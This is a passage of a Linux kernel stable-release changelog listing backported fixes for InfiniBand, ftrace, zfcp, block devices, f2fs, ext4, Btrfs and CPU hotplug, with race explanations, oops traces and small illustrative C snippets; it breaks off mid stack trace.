Bart Van Assche [Mon, 21 Nov 2016 18:22:17 +0000 (10:22 -0800)]
IB/multicast: Check ib_find_pkey() return value
commit d3a2418ee36a59bc02e9d454723f3175dcf4bfd9 upstream.
This patch checks the ib_find_pkey() return value so that Coverity no
longer complains about it being ignored.
Fixes: commit 547af76521b3 ("IB/multicast: Report errors on multicast groups if P_key changes")
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Cc: Sean Hefty <sean.hefty@intel.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Bart Van Assche [Mon, 21 Nov 2016 18:21:17 +0000 (10:21 -0800)]
IB/mad: Fix an array index check
commit 2fe2f378dd45847d2643638c07a7658822087836 upstream.
The array ib_mad_mgmt_class_table.method_table has MAX_MGMT_CLASS
(80) elements. Hence compare the array index with that value instead
of with IB_MGMT_MAX_METHODS (128). This avoids the following Coverity
report:
Overrunning array class->method_table of 80 8-byte elements at element index 127 (byte offset 1016) using index convert_mgmt_class(mad_hdr->mgmt_class) (which evaluates to 127).
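As a hedged, standalone illustration of the bounds rule above (not the mad.c code; the constants mirror the ones quoted in the message):

  #include <stdio.h>

  #define MAX_MGMT_CLASS      80   /* elements in method_table */
  #define IB_MGMT_MAX_METHODS 128  /* larger, unrelated bound   */

  static void *method_table[MAX_MGMT_CLASS];

  static void *lookup_class(unsigned int idx)
  {
          /* checking against IB_MGMT_MAX_METHODS would let idx reach 127
           * and overrun the 80-element array; check the array's own size */
          if (idx >= MAX_MGMT_CLASS)
                  return NULL;
          return method_table[idx];
  }

  int main(void)
  {
          printf("%p\n", lookup_class(127));   /* rejected, no overrun */
          return 0;
  }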
Fixes: commit b7ab0b19a85f ("IB/mad: Verify mgmt class in received MADs")
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Cc: Sean Hefty <sean.hefty@intel.com>
Reviewed-by: Hal Rosenstock <hal@mellanox.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Steven Rostedt (Red Hat) [Thu, 8 Dec 2016 17:48:26 +0000 (12:48 -0500)]
ftrace/x86_32: Set ftrace_stub to weak to prevent gcc from using short jumps to it
commit 847fa1a6d3d00f3bdf68ef5fa4a786f644a0dd67 upstream.
With new binutils, gcc may get smart with its optimization and change a jmp
from a 5 byte jump to a 2 byte one even though it was jumping to a global
function. But that global function existed within a 2 byte radius, and gcc
was able to optimize it. Unfortunately, that jump was also being modified
when function graph tracing begins. Since ftrace expected that jump to be 5
bytes, but it was only two, it overwrote code after the jump, causing a
crash.
This was fixed for x86_64 with commit 8329e818f149, with the same subject as
this commit, but nothing was done for x86_32.
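Purely as an illustration of the principle (a sketch, not the actual entry_32.S change; names are made up): the compiler cannot assume a weak definition is the one used at link time, so branches to it keep their full-length encoding that ftrace expects to patch.

  /* may be overridden at link time, so call/jump sites keep full encoding */
  void my_trace_stub(void) __attribute__((weak));

  void my_trace_stub(void)
  {
  }

  void my_traced_function(void)
  {
          my_trace_stub();
  }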
Fixes: d61f82d06672 ("ftrace: use dynamic patching for updating mcount calls")
Reported-by: Colin Ian King <colin.king@canonical.com>
Tested-by: Colin Ian King <colin.king@canonical.com>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Steffen Maier [Fri, 9 Dec 2016 16:16:33 +0000 (17:16 +0100)]
scsi: zfcp: fix rport unblock race with LUN recovery
commit 6f2ce1c6af37191640ee3ff6e8fc39ea10352f4c upstream.
It is unavoidable that zfcp_scsi_queuecommand() has to finish requests
with DID_IMM_RETRY (like fc_remote_port_chkready()) during the time
window when zfcp detected an unavailable rport but
fc_remote_port_delete(), which is asynchronous via
zfcp_scsi_schedule_rport_block(), has not yet blocked the rport.
However, for the case when the rport becomes available again, we should
prevent unblocking the rport too early. In contrast to other FCP LLDDs,
zfcp has to open each LUN with the FCP channel hardware before it can
send I/O to a LUN. So if a port already has LUNs attached and we
unblock the rport just after port recovery, recoveries of LUNs behind
this port can still be pending which in turn force
zfcp_scsi_queuecommand() to unnecessarily finish requests with
DID_IMM_RETRY.
This also opens a time window with unblocked rport (until the followup
LUN reopen recovery has finished). If a scsi_cmnd timeout occurs during
this time window fc_timed_out() cannot work as desired and such command
would indeed time out and trigger scsi_eh. This prevents a clean and
timely path failover. This should not happen if the path issue can be
recovered on FC transport layer such as path issues involving RSCNs.
Fix this by only calling zfcp_scsi_schedule_rport_register(), to
asynchronously trigger fc_remote_port_add(), after all LUN recoveries as
children of the rport have finished and no new recoveries of equal or
higher order were triggered meanwhile. Finished intentionally includes
any recovery result no matter if successful or failed (still unblock
rport so other successful LUNs work). For simplicity, we check after
each finished LUN recovery if there is another LUN recovery pending on
the same port and then do nothing. We handle the special case of a
successful recovery of a port without LUN children the same way without
changing this case's semantics.
For debugging we introduce 2 new trace records written if the rport
unblock attempt was aborted due to still unfinished or freshly triggered
recovery. The records are only written above the default trace level.
Benjamin noticed the important special case of new recovery that can be
triggered between having given up the erp_lock and before calling
zfcp_erp_action_cleanup() within zfcp_erp_strategy(). We must avoid the
following sequence:
ERP thread                 rport_work         other context
-------------------------  --------------     --------------------------------
port is unblocked, rport still blocked,
 due to pending/running ERP action,
 so ((port->status & ...UNBLOCK) != 0)
 and (port->rport == NULL)
unlock ERP
zfcp_erp_action_cleanup()
case ZFCP_ERP_ACTION_REOPEN_LUN:
zfcp_erp_try_rport_unblock()
((status & ...UNBLOCK) != 0) [OLD!]
                                              zfcp_erp_port_reopen()
                                              lock ERP
                                              zfcp_erp_port_block()
                                              port->status clear ...UNBLOCK
                                              unlock ERP
                                              zfcp_scsi_schedule_rport_block()
                                              port->rport_task = RPORT_DEL
                                              queue_work(rport_work)
                           zfcp_scsi_rport_work()
                           (port->rport_task != RPORT_ADD)
                           port->rport_task = RPORT_NONE
                           zfcp_scsi_rport_block()
                           if (!port->rport) return
zfcp_scsi_schedule_rport_register()
port->rport_task = RPORT_ADD
queue_work(rport_work)
                           zfcp_scsi_rport_work()
                           (port->rport_task == RPORT_ADD)
                           port->rport_task = RPORT_NONE
                           zfcp_scsi_rport_register()
                           (port->rport == NULL)
                           rport = fc_remote_port_add()
                           port->rport = rport;
Now the rport was erroneously unblocked while the zfcp_port is blocked.
This is another situation we want to avoid due to scsi_eh
potential. This state would at least remain until the new recovery from
the other context finished successfully, or potentially forever if it
failed. In order to close this race, we take the erp_lock inside
zfcp_erp_try_rport_unblock() when checking the status of zfcp_port or
LUN. With that, the possible corresponding rport state sequences would
be: (unblock[ERP thread],block[other context]) if the ERP thread gets
erp_lock first and still sees ((port->status & ...UNBLOCK) != 0),
(block[other context],NOP[ERP thread]) if the ERP thread gets erp_lock
after the other context has already cleared ...UNBLOCK from port->status.
Since checking fields of struct erp_action is unsafe because they could
have been overwritten (re-used for new recovery) meanwhile, we only
check status of zfcp_port and LUN since these are only changed under
erp_lock elsewhere. Regarding the check of the proper status flags (port
or port_forced are similar to the shown adapter recovery):
[zfcp_erp_adapter_shutdown()]
zfcp_erp_adapter_reopen()
zfcp_erp_adapter_block()
* clear UNBLOCK ---------------------------------------+
zfcp_scsi_schedule_rports_block() |
write_lock_irqsave(&adapter->erp_lock, flags);-------+ |
zfcp_erp_action_enqueue() | |
zfcp_erp_setup_act() | |
* set ERP_INUSE -----------------------------------|--|--+
write_unlock_irqrestore(&adapter->erp_lock, flags);--+ | |
.context-switch. | |
zfcp_erp_thread() | |
zfcp_erp_strategy() | |
write_lock_irqsave(&adapter->erp_lock, flags);------+ | |
... | | |
zfcp_erp_strategy_check_target() | | |
zfcp_erp_strategy_check_adapter() | | |
zfcp_erp_adapter_unblock() | | |
* set UNBLOCK -----------------------------------|--+ |
zfcp_erp_action_dequeue() | |
* clear ERP_INUSE ---------------------------------|-----+
... |
write_unlock_irqrestore(&adapter->erp_lock, flags);-+
Hence, we should check for both UNBLOCK and ERP_INUSE because they are
interleaved. Also we need to explicitly check ERP_FAILED for the link
down case which currently does not clear the UNBLOCK flag in
zfcp_fsf_link_down_info_eval().
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: 8830271c4819 ("[SCSI] zfcp: Dont fail SCSI commands when transitioning to blocked fc_rport")
Fixes: a2fa0aede07c ("[SCSI] zfcp: Block FC transport rports early on errors")
Fixes: 5f852be9e11d ("[SCSI] zfcp: Fix deadlock between zfcp ERP and SCSI")
Fixes: 338151e06608 ("[SCSI] zfcp: make use of fc_remote_port_delete when target port is unavailable")
Fixes: 3859f6a248cb ("[PATCH] zfcp: add rports to enable scsi_add_device to work again")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Steffen Maier [Fri, 9 Dec 2016 16:16:32 +0000 (17:16 +0100)]
scsi: zfcp: do not trace pure benign residual HBA responses at default level
commit 56d23ed7adf3974f10e91b643bd230e9c65b5f79 upstream.
Since quite a while, Linux issues enough SCSI commands per scsi_device
which successfully return with FCP_RESID_UNDER, FSF_FCP_RSP_AVAILABLE,
and SAM_STAT_GOOD. This floods the HBA trace area and we cannot see
other and important HBA trace records long enough.
Therefore, do not trace HBA response errors for pure benign residual
under counts at the default trace level.
This excludes benign residual under count combined with other validity
bits set in FCP_RSP_IU, such as FCP_SNS_LEN_VAL. For all those other
cases, we still do want to see both the HBA record and the corresponding
SCSI record by default.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes: a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Benjamin Block [Fri, 9 Dec 2016 16:16:31 +0000 (17:16 +0100)]
scsi: zfcp: fix use-after-"free" in FC ingress path after TMF
commit dac37e15b7d511e026a9313c8c46794c144103cd upstream.
When SCSI EH invokes zFCP's callbacks for eh_device_reset_handler() and
eh_target_reset_handler(), it expects us to relent the ownership over
the given scsi_cmnd and all other scsi_cmnds within the same scope - LUN
or target - when returning with SUCCESS from the callback ('release'
them). SCSI EH can then reuse those commands.
We did not follow this rule to release commands upon SUCCESS; and if
later a reply arrived for one of those supposed to be released commands,
we would still make use of the scsi_cmnd in our ingress tasklet. This
will at least result in undefined behavior or a kernel panic because of
a wrong kernel pointer dereference.
To fix this, we NULLify all pointers to scsi_cmnds (struct zfcp_fsf_req
*)->data in the matching scope if a TMF was successful. This is done
under the locks (struct zfcp_adapter *)->abort_lock and (struct
zfcp_reqlist *)->lock to prevent the requests from being removed from
the request-hashtable, and the ingress tasklet from making use of the
scsi_cmnd-pointer in zfcp_fsf_fcp_cmnd_handler().
For cases where a reply arrives during SCSI EH, but before we get a
chance to NULLify the pointer - but before we return from the callback
-, we assume that the code is protected from races via the CAS operation
in blk_complete_request() that is called in scsi_done().
The following stacktrace shows an example for a crash resulting from the
previous behavior:
Unable to handle kernel pointer dereference at virtual kernel address fffffee17a672000
Oops: 0038 [#1] SMP
CPU: 2 PID: 0 Comm: swapper/2 Not tainted
task: 00000003f7ff5be0 ti: 00000003f3d38000 task.ti: 00000003f3d38000
Krnl PSW : 0404d00180000000 00000000001156b0 (smp_vcpu_scheduled+0x18/0x40)
           R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:1 PM:0 EA:3
Krnl GPRS: 000000200000007e 0000000000000000 fffffee17a671fd8 0000000300000015
           ffffffff80000000 00000000005dfde8 07000003f7f80e00 000000004fa4e800
           000000036ce8d8f8 000000036ce8d9c0 00000003ece8fe00 ffffffff969c9e93
           00000003fffffffd 000000036ce8da10 00000000003bf134 00000003f3b07918
Krnl Code: 00000000001156a2: a7190000        lghi    %r1,0
           00000000001156a6: a7380015        lhi     %r3,21
          #00000000001156aa: e32050000008    ag      %r2,0(%r5)
          >00000000001156b0: 482022b0        lh      %r2,688(%r2)
           00000000001156b4: ae123000        sigp    %r1,%r2,0(%r3)
           00000000001156b8: b2220020        ipm     %r2
           00000000001156bc: 8820001c        srl     %r2,28
           00000000001156c0: c02700000001    xilf    %r2,1
Call Trace:
([<0000000000000000>] 0x0)
 [<000003ff807bdb8e>] zfcp_fsf_fcp_cmnd_handler+0x3de/0x490 [zfcp]
 [<000003ff807be30a>] zfcp_fsf_req_complete+0x252/0x800 [zfcp]
 [<000003ff807c0a48>] zfcp_fsf_reqid_check+0xe8/0x190 [zfcp]
 [<000003ff807c194e>] zfcp_qdio_int_resp+0x66/0x188 [zfcp]
 [<000003ff80440c64>] qdio_kick_handler+0xdc/0x310 [qdio]
 [<000003ff804463d0>] __tiqdio_inbound_processing+0xf8/0xcd8 [qdio]
 [<0000000000141fd4>] tasklet_action+0x9c/0x170
 [<0000000000141550>] __do_softirq+0xe8/0x258
 [<000000000010ce0a>] do_softirq+0xba/0xc0
 [<000000000014187c>] irq_exit+0xc4/0xe8
 [<000000000046b526>] do_IRQ+0x146/0x1d8
 [<00000000005d6a3c>] io_return+0x0/0x8
 [<00000000005d6422>] vtime_stop_cpu+0x4a/0xa0
([<0000000000000000>] 0x0)
 [<0000000000103d8a>] arch_cpu_idle+0xa2/0xb0
 [<0000000000197f94>] cpu_startup_entry+0x13c/0x1f8
 [<0000000000114782>] smp_start_secondary+0xda/0xe8
 [<00000000005d6efe>] restart_int_handler+0x56/0x6c
 [<0000000000000000>] 0x0
Last Breaking-Event-Address:
 [<00000000003bf12e>] arch_spin_lock_wait+0x56/0xb0
Suggested-by: Steffen Maier <maier@linux.vnet.ibm.com>
Signed-off-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Fixes: ea127f9754 ("[PATCH] s390 (7/7): zfcp host adapter.") (tglx/history.git)
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Rabin Vincent [Thu, 1 Dec 2016 08:18:28 +0000 (09:18 +0100)]
block: protect iterate_bdevs() against concurrent close
commit af309226db916e2c6e08d3eba3fa5c34225200c4 upstream.
If a block device is closed while iterate_bdevs() is handling it, the
following NULL pointer dereference occurs because bdev->bd_disk is NULL
in bdev_get_queue(), which is called from blk_get_backing_dev_info() (in
turn called by the mapping_cap_writeback_dirty() call in
__filemap_fdatawrite_range()):
BUG: unable to handle kernel NULL pointer dereference at 0000000000000508
IP: [<ffffffff81314790>] blk_get_backing_dev_info+0x10/0x20
PGD 9e62067 PUD 9ee8067 PMD 0
Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC
Modules linked in:
CPU: 1 PID: 2422 Comm: sync Not tainted 4.5.0-rc7+ #400
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)
task: ffff880009f4d700 ti: ffff880009f5c000 task.ti: ffff880009f5c000
RIP: 0010:[<ffffffff81314790>]  [<ffffffff81314790>] blk_get_backing_dev_info+0x10/0x20
RSP: 0018:ffff880009f5fe68  EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff88000ec17a38 RCX: ffffffff81a4e940
RDX: 7fffffffffffffff RSI: 0000000000000000 RDI: ffff88000ec176c0
RBP: ffff880009f5fe68 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000001 R11: 0000000000000000 R12: ffff88000ec17860
R13: ffffffff811b25c0 R14: ffff88000ec178e0 R15: ffff88000ec17a38
FS:  00007faee505d700(0000) GS:ffff88000fb00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000000000000508 CR3: 0000000009e8a000 CR4: 00000000000006e0
Stack:
 ffff880009f5feb8 ffffffff8112e7f5 0000000000000000 7fffffffffffffff
 0000000000000000 0000000000000000 7fffffffffffffff 0000000000000001
 ffff88000ec178e0 ffff88000ec17860 ffff880009f5fec8 ffffffff8112e81f
Call Trace:
 [<ffffffff8112e7f5>] __filemap_fdatawrite_range+0x85/0x90
 [<ffffffff8112e81f>] filemap_fdatawrite+0x1f/0x30
 [<ffffffff811b25d6>] fdatawrite_one_bdev+0x16/0x20
 [<ffffffff811bc402>] iterate_bdevs+0xf2/0x130
 [<ffffffff811b2763>] sys_sync+0x63/0x90
 [<ffffffff815d4272>] entry_SYSCALL_64_fastpath+0x12/0x76
Code: 0f 1f 44 00 00 48 8b 87 f0 00 00 00 55 48 89 e5 <48> 8b 80 08 05 00 00 5d
RIP  [<ffffffff81314790>] blk_get_backing_dev_info+0x10/0x20
 RSP <ffff880009f5fe68>
CR2: 0000000000000508
---[ end trace 2487336ceb3de62d ]---
The crash is easily reproducible by running the following command, if an
msleep(100) is inserted before the call to func() in iterate_bdevs():
while :; do head -c1 /dev/nullb0; done > /dev/null & while :; do sync; done
Fix it by holding the bd_mutex across the func() call and only calling
func() if the bdev is opened.
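A hedged sketch of that locking pattern with made-up userspace types (not the fs/block_dev.c code): take the per-device mutex around the callback and skip devices that are not currently open.

  #include <pthread.h>

  struct bdev {
          pthread_mutex_t bd_mutex;
          int bd_openers;               /* > 0 while the device is open */
  };

  static void iterate_one(struct bdev *bdev,
                          void (*func)(struct bdev *, void *), void *arg)
  {
          pthread_mutex_lock(&bdev->bd_mutex);
          if (bdev->bd_openers > 0)     /* only call func() on opened bdevs */
                  func(bdev, arg);
          pthread_mutex_unlock(&bdev->bd_mutex);
  }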
Fixes: 5c0d6b60a0ba ("vfs: Create function for iterating over block devices")
Reported-and-tested-by: Wei Fang <fangwei1@huawei.com>
Signed-off-by: Rabin Vincent <rabinv@axis.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Nicolai Stange [Sun, 20 Nov 2016 18:57:23 +0000 (19:57 +0100)]
f2fs: set ->owner for debugfs status file's file_operations
commit 05e6ea2685c964db1e675a24a4f4e2adc22d2388 upstream.
The struct file_operations instance serving the f2fs/status debugfs file
lacks an initialization of its ->owner.
This means that although that file might have been opened, the f2fs module
can still get removed. Any further operation on that opened file, releasing
included, will cause accesses to unmapped memory.
Indeed, Mike Marshall reported the following:
BUG: unable to handle kernel paging request at ffffffffa0307430
IP: [<ffffffff8132a224>] full_proxy_release+0x24/0x90
<...>
Call Trace:
[] __fput+0xdf/0x1d0
[] ____fput+0xe/0x10
[] task_work_run+0x8e/0xc0
[] do_exit+0x2ae/0xae0
[] ? __audit_syscall_entry+0xae/0x100
[] ? syscall_trace_enter+0x1ca/0x310
[] do_group_exit+0x44/0xc0
[] SyS_exit_group+0x14/0x20
[] do_syscall_64+0x61/0x150
[] entry_SYSCALL64_slow_path+0x25/0x25
<...>
---[ end trace f22ae883fa3ea6b8 ]---
Fixing recursive fault but reboot is needed!
Fix this by initializing the f2fs/status file_operations' ->owner with
THIS_MODULE.
This will allow debugfs to grab a reference to the f2fs module upon any
open on that file, thus preventing it from getting removed.
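A minimal kernel-style sketch of the pattern described above (illustrative only; the show callback is made up): with .owner set, the VFS pins the module for as long as the file is open.

  #include <linux/module.h>
  #include <linux/fs.h>
  #include <linux/seq_file.h>

  static int stat_show(struct seq_file *s, void *v)
  {
          seq_puts(s, "status\n");
          return 0;
  }

  static int stat_open(struct inode *inode, struct file *file)
  {
          return single_open(file, stat_show, inode->i_private);
  }

  static const struct file_operations stat_fops = {
          .owner   = THIS_MODULE,       /* the missing initialization */
          .open    = stat_open,
          .read    = seq_read,
          .llseek  = seq_lseek,
          .release = single_release,
  };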
Fixes: 902829aa0b72 ("f2fs: move proc files to debugfs")
Reported-by: Mike Marshall <hubcap@omnibond.com>
Reported-by: Martin Brandenburg <martin@omnibond.com>
Signed-off-by: Nicolai Stange <nicstange@gmail.com>
Signed-off-by: Jaegeuk Kim <jaegeuk@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Dan Carpenter [Sat, 10 Dec 2016 14:56:01 +0000 (09:56 -0500)]
ext4: return -ENOMEM instead of success
commit 578620f451f836389424833f1454eeeb2ffc9e9f upstream.
We should set the error code if kzalloc() fails.
Fixes: 67cf5b09a46f ("ext4: add the basic function for inline data support")
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Darrick J. Wong [Sat, 10 Dec 2016 14:55:01 +0000 (09:55 -0500)]
ext4: reject inodes with negative size
commit 7e6e1ef48fc02f3ac5d0edecbb0c6087cd758d58 upstream.
Don't load an inode with a negative size; this causes integer overflow
problems in the VFS.
[ Added EXT4_ERROR_INODE() to mark file system as corrupted. -TYT]
js: use EIO for 3.12 instead of EFSCORRUPTED.
Fixes: a48380f769df (ext4: rename i_dir_acl to i_size_high)
Signed-off-by: Darrick J. Wong <darrick.wong@oracle.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Chandan Rajendra [Tue, 15 Nov 2016 02:26:26 +0000 (21:26 -0500)]
ext4: fix stack memory corruption with 64k block size
commit 30a9d7afe70ed6bd9191d3000e2ef1a34fb58493 upstream.
The number of 'counters' elements needed in 'struct sg' is
super_block->s_blocksize_bits + 2. Presently we have 16 'counters'
elements in the array. This is insufficient for block sizes >= 32k. In
such cases the memcpy operation performed in ext4_mb_seq_groups_show()
would cause stack memory corruption.
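A quick standalone check of the sizing rule quoted above (illustrative only): with the stated formula, 16 slots only cover block sizes up to 16k.

  #include <stdio.h>

  int main(void)
  {
          for (unsigned int bits = 10; bits <= 16; bits++)
                  printf("block size %6u -> counters needed %u\n",
                         1u << bits, bits + 2);
          return 0;
  }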
Fixes: c9de560ded61f
Signed-off-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Jan Kara <jack@suse.cz>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Chandan Rajendra [Tue, 15 Nov 2016 02:04:37 +0000 (21:04 -0500)]
ext4: fix mballoc breakage with 64k block size
commit 69e43e8cc971a79dd1ee5d4343d8e63f82725123 upstream.
'border' variable is set to a value of 2 times the block size of the
underlying filesystem. With 64k block size, the resulting value won't
fit into a 16-bit variable. Hence this commit changes the data type of
'border' to 'unsigned int'.
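A standalone demonstration of the truncation described above (illustrative only):

  #include <stdio.h>

  int main(void)
  {
          unsigned short border16 = 2 * 65536;   /* truncates: 131072 wraps to 0 */
          unsigned int   border32 = 2 * 65536;   /* 131072, as intended */

          printf("16-bit border = %u, 32-bit border = %u\n",
                 border16, border32);
          return 0;
  }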
Fixes: c9de560ded61f
Signed-off-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Alex Porosanu [Wed, 9 Nov 2016 08:46:11 +0000 (10:46 +0200)]
crypto: caam - fix AEAD givenc descriptors
commit d128af17876d79b87edf048303f98b35f6a53dbc upstream.
The AEAD givenc descriptor relies on moving the IV through the
output FIFO and then back to the CTX2 for authentication. The
SEQ FIFO STORE could be scheduled before the data can be
read from OFIFO, especially since the SEQ FIFO LOAD needs
to wait for the SEQ FIFO LOAD SKIP to finish first. The
SKIP takes more time when the input is SG than when it's
a contiguous buffer. If the SEQ FIFO LOAD is not scheduled
before the STORE, the DECO will hang waiting for data
to be available in the OFIFO so it can be transferred to C2.
In order to overcome this, first force transfer of IV to C2
by starting the "cryptlen" transfer first and then starting to
store data from OFIFO to the output buffer.
Fixes: 1acebad3d8db8 ("crypto: caam - faster aead implementation")
Signed-off-by: Alex Porosanu <alexandru.porosanu@nxp.com>
Signed-off-by: Horia Geantă <horia.geanta@nxp.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Willy Tarreau <w@1wt.eu>
NeilBrown [Mon, 12 Dec 2016 15:21:51 +0000 (08:21 -0700)]
block_dev: don't test bdev->bd_contains when it is not stable
commit bcc7f5b4bee8e327689a4d994022765855c807ff upstream.
bdev->bd_contains is not stable before calling __blkdev_get().
When __blkdev_get() is called on a partition with ->bd_openers == 0
it sets
bdev->bd_contains = bdev;
which is not correct for a partition.
After a call to __blkdev_get() succeeds, ->bd_openers will be > 0
and then ->bd_contains is stable.
When FMODE_EXCL is used, blkdev_get() calls
bd_start_claiming() -> bd_prepare_to_claim() -> bd_may_claim()
This call happens before __blkdev_get() is called, so ->bd_contains
is not stable. So bd_may_claim() cannot safely use ->bd_contains.
It currently tries to use it, and this can lead to a BUG_ON().
This happens when a whole device is already open with a bd_holder (in
use by dm in my particular example) and two threads race to open a
partition of that device for the first time, one opening with O_EXCL and
one without.
The thread that doesn't use O_EXCL gets through blkdev_get() to
__blkdev_get(), gains the ->bd_mutex, and sets bdev->bd_contains = bdev;
Immediately thereafter the other thread, using FMODE_EXCL, calls
bd_start_claiming() from blkdev_get(). This should fail because the
whole device has a holder, but because bdev->bd_contains == bdev
bd_may_claim() incorrectly reports success.
This thread continues and blocks on bd_mutex.
The first thread then sets bdev->bd_contains correctly and drops the mutex.
The thread using FMODE_EXCL then continues and when it calls bd_may_claim()
again in:
BUG_ON(!bd_may_claim(bdev, whole, holder));
The BUG_ON fires.
Fix this by removing the dependency on ->bd_contains in
bd_may_claim(). As bd_may_claim() has direct access to the whole
device, it can simply test if the target bdev is the whole device.
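A hedged sketch of that check with simplified, made-up types (not the real bd_may_claim()): compare against the whole-device pointer that is passed in rather than trusting bd_contains.

  #include <stdbool.h>

  struct blkdev {
          struct blkdev *bd_contains;   /* not stable before first open */
          void *bd_holder;
  };

  static bool bd_is_whole_device(const struct blkdev *bdev,
                                 const struct blkdev *whole)
  {
          return bdev == whole;         /* no dependency on bd_contains */
  }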
Fixes: 6b4517a7913a ("block: implement bd_claiming and claiming block")
Signed-off-by: NeilBrown <neilb@suse.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Johan Hovold [Tue, 29 Nov 2016 15:55:01 +0000 (16:55 +0100)]
USB: serial: kl5kusb105: fix open error path
commit 6774d5f53271d5f60464f824748995b71da401ab upstream.
Kill urbs and disable read before returning from open on failure to
retrieve the line state.
Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Robbie Ko [Fri, 7 Oct 2016 09:30:47 +0000 (17:30 +0800)]
Btrfs: fix tree search logic when replaying directory entry deletes
commit 2a7bf53f577e49c43de4ffa7776056de26db65d9 upstream.
If a log tree has a layout like the following:
leaf N:
...
item 240 key (282 DIR_LOG_ITEM 0) itemoff 8189 itemsize 8
        dir log end 1275809046
leaf N + 1:
item 0 key (282 DIR_LOG_ITEM 3936149215) itemoff 16275 itemsize 8
        dir log end 18446744073709551615
...
When we pass the value 1275809046 + 1 as the parameter start_ret to the
function tree-log.c:find_dir_range() (done by replay_dir_deletes()), we
end up with path->slots[0] having the value 239 (points to the last item
of leaf N, item 240). Because the dir log item in that position has an
offset value smaller than *start_ret (1275809046 + 1) we need to move on
to the next leaf, however the logic for that is wrong since it compares
the current slot to the number of items in the leaf, which is smaller
and therefore we don't lookup for the next leaf but instead we set the
slot to point to an item that does not exist, at slot 240, and we later
operate on that slot which has unexpected content or in the worst case
can result in an invalid memory access (accessing beyond the last page
of leaf N's extent buffer).
So fix the logic that checks when we need to lookup at the next leaf
by first incrementing the slot and only after to check if that slot
is beyond the last item of the current leaf.
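A hedged sketch of that ordering (not the btrfs code; the helper name is invented): bump the slot first, then compare it with the item count, so slot == nritems means "read the next leaf" rather than "use a non-existent item".

  static int advance_slot(unsigned int *slot, unsigned int nritems)
  {
          (*slot)++;
          if (*slot >= nritems)
                  return 1;     /* caller must move to the next leaf */
          return 0;             /* slot still points inside this leaf */
  }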
Signed-off-by: Robbie Ko <robbieko@synology.com>
Reviewed-by: Filipe Manana <fdmanana@suse.com>
Fixes: e02119d5a7b4 (Btrfs: Add a write ahead tree log to optimize synchronous operations)
Signed-off-by: Filipe Manana <fdmanana@suse.com>
[Modified changelog for clarity and correctness]
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Michal Hocko [Wed, 7 Dec 2016 13:54:38 +0000 (14:54 +0100)]
hotplug: Make register and unregister notifier API symmetric
commit 777c6e0daebb3fcefbbd6f620410a946b07ef6d0 upstream.
Yu Zhao has noticed that __unregister_cpu_notifier only unregisters its
notifiers when HOTPLUG_CPU=y while the registration might succeed even
when HOTPLUG_CPU=n if MODULE is enabled. This means that e.g. zswap
might keep a stale notifier on the list on the manual clean up during
the pool tear down and thus corrupt the list, resulting in the following:
[ 144.964346] BUG: unable to handle kernel paging request at ffff880658a2be78
[ 144.971337] IP: [<ffffffffa290b00b>] raw_notifier_chain_register+0x1b/0x40
<snipped>
[ 145.122628] Call Trace:
[ 145.125086]  [<ffffffffa28e5cf8>] __register_cpu_notifier+0x18/0x20
[ 145.131350]  [<ffffffffa2a5dd73>] zswap_pool_create+0x273/0x400
[ 145.137268]  [<ffffffffa2a5e0fc>] __zswap_param_set+0x1fc/0x300
[ 145.143188]  [<ffffffffa2944c1d>] ? trace_hardirqs_on+0xd/0x10
[ 145.149018]  [<ffffffffa2908798>] ? kernel_param_lock+0x28/0x30
